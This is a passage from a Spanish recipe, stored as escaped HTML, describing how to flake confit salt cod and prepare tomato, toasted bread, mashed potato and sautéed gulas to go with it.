D\u00e9jalo reposar hasta que el bacalao este tibio y separar las l\u00e1minas con la mano.<\/p>\n<p>Mientras se confita el bacalao, podemos cortar el tomate en medias lunas finas y cortar y tostar ligeramente el pan. Hervir la patata con piel y machacar en un bol con un poco del aceite de oliva que hemos usado para confitar el bacalao y a\u00f1adir sal.<\/p>\n<p>Dorar las gulas con un poco de aceite, ajo y pimienta, a\u00f1adir las gulas y saltear.
